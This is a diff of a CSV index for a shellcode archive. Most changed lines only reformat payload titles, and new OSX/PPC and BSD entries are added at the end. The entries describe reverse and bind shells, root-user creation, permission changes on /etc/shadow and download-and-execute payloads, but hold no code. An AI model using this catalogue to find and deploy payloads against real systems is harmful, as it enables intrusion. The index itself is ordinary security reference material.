 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
 18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
-18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
+18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
 20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
 21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
 21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
@@ -461,7 +462,7 @@ id,file,description,date,author,type,platform
 29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
 40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
-34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
+34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
 34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
 34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
 34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
@@ -472,15 +473,15 @@ id,file,description,date,author,type,platform
 35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
 35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
 35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
-35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
+35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
 36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
 36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
 36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
-36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
+36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
-36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
+36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86
@@ -488,69 +489,69 @@ id,file,description,date,author,type,platform
 36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
 36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86
 36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86
-36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86
+36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86
 36779,shellcodes/windows_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
 36780,shellcodes/windows_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
-36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
-36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
-36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
+36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
+36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
+36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
 36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
 36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
-37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
-37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86
+37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
+37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86
 37285,shellcodes/linux_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
 37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
 37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
 37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
 37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
-37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
+37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
 37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
-37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,linux_x86
+37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,linux_x86
 37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
-37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
-37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
+37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
+37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
 37664,shellcodes/windows_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
 37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
 37758,shellcodes/windows_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
-37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
+37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
 37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
-38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
+38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
 38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
-38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
+38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
 38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
 38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86
 38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
-38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
+38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
 38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
-38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
+38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
 38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
 38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
-38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
+38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
 38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
 39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
 39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
-39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
+39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
 39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
 39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
 39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
-39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
+39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
 39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
 39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
-39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
+39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
 39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
 39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
-39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
-39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
-39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
+39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
+39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
+39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
 39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
 39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
 39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
@@ -566,14 +567,14 @@ id,file,description,date,author,type,platform
 39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
 39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
-39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
+39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
 39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
 39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
 40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
+40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
 40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
 40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
@@ -583,7 +584,7 @@ id,file,description,date,author,type,platform
 40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
 40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
-40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
+40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
 40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
 40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
@@ -610,18 +611,69 @@ id,file,description,date,author,type,platform
 43606,shellcodes/linux_x86-64/43606.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
 43607,shellcodes/linux_x86-64/43607.c,"Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
 43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
+43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc
+43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
+43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
+43613,shellcodes/osx_ppc/43613.asm,"OSX/PPC - Stager Sock Find Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
+43614,shellcodes/osx_ppc/43614.asm,"OSX/PPC - Stager Sock Reverse Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
+43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc
+43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
+43617,shellcodes/osx_ppc/43617.c,"OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)",2009-01-01,haphet,shellcode,osx_ppc
+43618,shellcodes/osx/43618.c,"OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)",2009-01-01,haphet,shellcode,osx
+43626,shellcodes/linux_x86/43626.c,"Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)",2009-01-01,vlad902,shellcode,linux_x86
+43627,shellcodes/bsd_x86/43627.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
